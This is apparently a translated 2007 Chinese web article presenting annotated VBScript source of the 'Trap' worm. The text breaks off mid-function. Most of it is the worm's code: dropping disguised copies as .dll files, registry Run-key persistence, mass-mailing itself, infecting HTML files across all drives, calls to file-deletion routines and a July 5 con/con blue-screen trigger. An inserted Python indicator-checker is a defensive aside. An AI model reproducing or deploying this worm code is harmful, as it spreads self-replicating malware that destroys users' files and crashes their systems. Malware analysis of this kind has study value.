The "Trap" Virus Source Code Revealed
2007-11-27 17:55:42 Source: WEB开发网
I was unfortunate enough to be hit by "Trap" myself: on July 5 my computer blue-screened. So I studied the source code of "Trap" and, after some effort, finally worked out how the code operates. Below is a detailed breakdown of how "Trap" triggers and of its source code.
The virus can encrypt itself (using JavaScript encoding), so an ordinary user cannot see the original virus code. The copy inside an infected VBS file is not encrypted, however, and using that as the entry point I obtained the complete source with no difficulty.
@ thank you! make use of other person to get rid of an enemy, trap _2001
This sentence probably means "kill with a borrowed knife" (借刀杀人); it is followed by the virus's name, "Trap".
on error resume next
dim vbscr, fso, w1, w2, MSWKEY, HCUW, Code_Str, Vbs_Str, Js_Str
dim defpath, smailc, MAX_SIZE
dim whb(), title(10)
smailc = 4
Redim whb(smailc) ' mailing list of White House staff
whb(0) = "president@whitehouse.gov"
whb(1) = "vice.president@whitehouse.gov"
whb(2) = "first.lady@whitehouse.gov"
whb(3) = "mrs.cheney@whitehouse.gov"
' subjects of the mails to be sent
title(0) = "Thanks for helping me!"
title(1) = "The police are investigating the robbery"
title(2) = "an application for a job"
title(3) = "The aspects of an application process pertinent to OSI"
title(4) = "What a pleasant weather. Why not go out for a walk?"
title(5) = "These countries have gone / been through too many wars"
title(6) = "We've fixed on the 17th of April for the wedding"
title(7) = "The wind failed and the sea returned to calmness."
title(8) = "the sitting is open!"
title(9) = ""
defpath = "C:\Readme.html" ' the virus file
MAX_SIZE = 100000 ' maximum size of a file that will be infected
MSWKEY = "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\"
HCUW = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"
main
sub main() ' main program
on error resume next
dim w_s
w_s = WScript.ScriptFullName ' get the path of the virus file itself
if w_s = "" then
Err.Clear
set fso = CreateObject("Scripting.FileSystemObject") ' create the file system object
if getErr then ' determine which state the virus is running in
Randomize ' initialise the random seed
ra = int(rnd() * 7) ' produce a random number
doucment.write title(ra) ' write random content
ExecuteMail ' routine run when in the mail state
else
ExecutePage ' routine run when in the web-page state
end if
else
ExecuteVbs ' routine run when in the VBS-file state
end if
end sub
Function getErr() ' ignore errors
if Err.number <> 0 then
getErr = true
Err.Clear
else
getErr = false
end if
end function
sub ExecutePage() ' routine run when in the web-page state
on error resume next
dim Html_Str, adi, wdf, wdf2, wdf3, wdsf, wdsf2, vf
Vbs_Str = GetScriptCode("vbscript") ' get the VBScript code
Js_Str = GetJavaScript() ' get the JavaScript code
Code_Str = MakeScript(encrypt(Vbs_str), true) ' get the already-encrypted script code
Html_Str = MakeHtml(encrypt(Vbs_str), true) ' get the already-encrypted complete HTML code
Gf
' define the paths of the virus files
wdsf = w2 & "Mdm.vbs"
wdsf2 = w1 & "Profile.vbs"
wdf = w2 & "user.dll" ' note that wdf and wdf3 are two very misleading files
wdf2 = w2 & "Readme.html"
wdf3 = w2 & "system.dll"
' create the virus files
set vf = fso.OpenTextFile(wdf, 2, true)
vf.write Vbs_Str
vf.close
set vf = fso.OpenTextFile(wdsf, 2, true)
vf.write Vbs_Str
vf.close
set vf = fso.OpenTextFile(wdsf2, 2, true)
vf.Write Vbs_Str
vf.close
set vf = fso.OpenTextFile(wdf2, 2, true)
vf.write Html_Str
vf.close
set vf = fso.OpenTextFile(wdf3, 2, true)
vf.write Code_Str
vf.close
' modify the registry so that the virus files run automatically at every boot
Writereg MSWKEY & "CurrentVersion\Run\Mdm", wdsf, ""
Writereg MSWKEY & "CurrentVersion\RunServices\Profile", wdsf2, ""
SendMail ' run the mail-sending routine
Hackpage ' run the website-infection routine
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then ' walk every local hard disk and network share
call SearchHTML(x & "\") ' run the file-infection routine
end if
next
if TestUser then ' check the user
Killhe ' run the file-deletion operation
else
if Month(Date) & Day(Date) = "75" then ' if the system date is July 5
set vf = fso.OpenTextFile(w2 & "75.htm", 2, true) ' create the system-attack file
vf.write MakeScript("window.navigate ('c:/con/con');", false)
vf.close
Writereg MSWKEY & "CurrentVersion\Run\75", w2 & "75.htm", "" ' auto-start
window.navigate "c:/con/con" ' immediate blue screen: exploits a Windows bug that hangs a Win9x system every time (an unrecoverable blue screen)
else ' if it is not July 5
if fso.FileExists(w2 & "75.htm") then fso.DeleteFile w2 & "75.htm" ' delete 75.htm
end if
end if
if fso.FileExists(defpath) then fso.DeleteFile defpath ' delete the C:\Readme.html virus file
end sub
sub ExecuteMail() ' routine run when in the mail state
on error resume next
Vbs_Str = GetScriptCode("vbscript")
Js_Str = GetJavaScript()
Set Stl = CreateObject("Scriptlet.TypeLib") ' create the TypeLib object
with Stl
.Reset
.Path = defpath
.Doc = MakeHtml(encrypt(Vbs_str), true)
.Write() ' create the C:\Readme.html file
end with
window.open defpath, "trap", "width=1 height=1 menubar=no scrollbars=no toolbar=no" ' open a window that stays hidden
end sub
sub ExecuteVbs() ' likewise, the routine run when the virus file is a VBS file
on error resume next
dim x, adi, wvbs, ws, vf
set fso = CreateObject("Scripting.FileSystemObject")
set wvbs = CreateObject("WScript.Shell")
Gf
wvbs.RegWrite MSWKEY & "Windows Scripting Host\Setings\Timeout", 0, "REG_DWORD"
set vf = fso.OpenTextFile(w2 & "system.dll", 1)
Code_Str = vf.ReadAll()
vf.close
Hackpage
SendMail
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then
call SearchHTML(x & "\")
end if
next
if TestUser then Killhe
end sub
sub Gf() ' get the system paths
w1 = fso.GetSpecialFolder(0) & "\"
w2 = fso.GetSpecialFolder(1) & "\"
end sub
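The ExecutePage and ExecuteVbs routines above give a defender a compact set of indicators: the six dropped file names, script text written under .dll names, the Run/RunServices values, the Scriptlet.TypeLib dropper and the con/con trigger. The following Python checker is an added example, not code from the article or from the worm; the indicator strings are taken from the listing above and every sample input is constructed.

```python
import re

# Indicators copied from the worm listing on this page; the sample inputs at
# the bottom are constructed, not captured from an infected machine.
DROPPED_NAMES = {"mdm.vbs", "profile.vbs", "user.dll", "system.dll",
                 "readme.html", "75.htm"}
SIGNATURES = {
    "marker": re.compile(r"make use of other person to get rid of an enemy", re.I),
    "persistence": re.compile(r"CurrentVersion\\Run(Services)?\\(Mdm|Profile|75)\b", re.I),
    "dropper": re.compile(r"Scriptlet\.TypeLib", re.I),
    "wsh_timeout": re.compile(r"Windows Scripting Host\\Set+ings\\Timeout", re.I),
    "con_payload": re.compile(r"window\.navigate\b.{0,10}c:/con/con", re.I),
}

def matched_signatures(text):
    """Names of the content signatures that fire on text, in SIGNATURES order."""
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def is_fake_dll(name, data):
    """The worm writes script text under .dll names; a real DLL starts with 'MZ'."""
    return name.lower().endswith(".dll") and not data.startswith(b"MZ")

def assess(name, data):
    """Combine the dropped-name check, the fake-DLL check and content signatures."""
    sigs = matched_signatures(data.decode("latin-1"))
    name_hit = name.lower() in DROPPED_NAMES
    fake_dll = is_fake_dll(name, data)
    # Any content signature is decisive; a worm-style file name or a text file
    # posing as a DLL on its own only warrants a closer look.
    if sigs:
        verdict = "infected"
    elif name_hit or fake_dll:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"name": name, "verdict": verdict, "signatures": sigs,
            "dropped_name": name_hit, "fake_dll": fake_dll}

# Constructed samples: a fragment shaped like the worm's dropped system.dll,
# a file with a genuine PE header, and a harmless script.
SAMPLES = {
    "system.dll": b'Set Stl = CreateObject("Scriptlet.TypeLib")\r\n'
                  b'Writereg MSWKEY & "CurrentVersion\\Run\\Mdm", wdsf, ""\r\n',
    "real.dll": b"MZ\x90\x00" + b"\x00" * 60,
    "hello.vbs": b'MsgBox "hello"\r\n',
}
```

Run assess() over files found in the Windows and System directories (the w1 and w2 paths the worm uses), and treat a "suspicious" verdict on user.dll or system.dll as a prompt to inspect the registry Run keys listed above.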
function Readreg(key_str) ' read the registry
set tmps = CreateObject("WScript.Shell")
Readreg = tmps.RegRead(key_str)
set tmps = Nothing
end function
function Writereg(key_str, Newvalue, vtype) ' write the registry
set tmps = CreateObject("WScript.Shell")
if vtype = "" then
tmps.RegWrite key_str, Newvalue
else
tmps.RegWrite key_str, Newvalue, vtype
end if
set tmps = Nothing
end function
function MakeHtml(Sbuffer, iHTML) ' build the complete code of the HTML file
dim ra
Randomize
ra = int(rnd() * 7)
MakeHtml = "<" & "HTML><" & "HEAD><" & "TITLE>" & title(ra) & "</" & "TITLE><" & "/HEAD>" & _
"<BO" & "AD>" & vbcrlf & MakeScript(Sbuffer, iHTML) & vbcrlf & _
"<" & "/BOAD><" & "/HTML>"
end Function
function MakeScript(Codestr, iHTML) ' this routine is the virus's self-encryption process; it is fairly involved and is not described further
if iHTML then
dim DocuWrite
DocuWrite = document.write(<+ & SCRIPT Language=JavaScr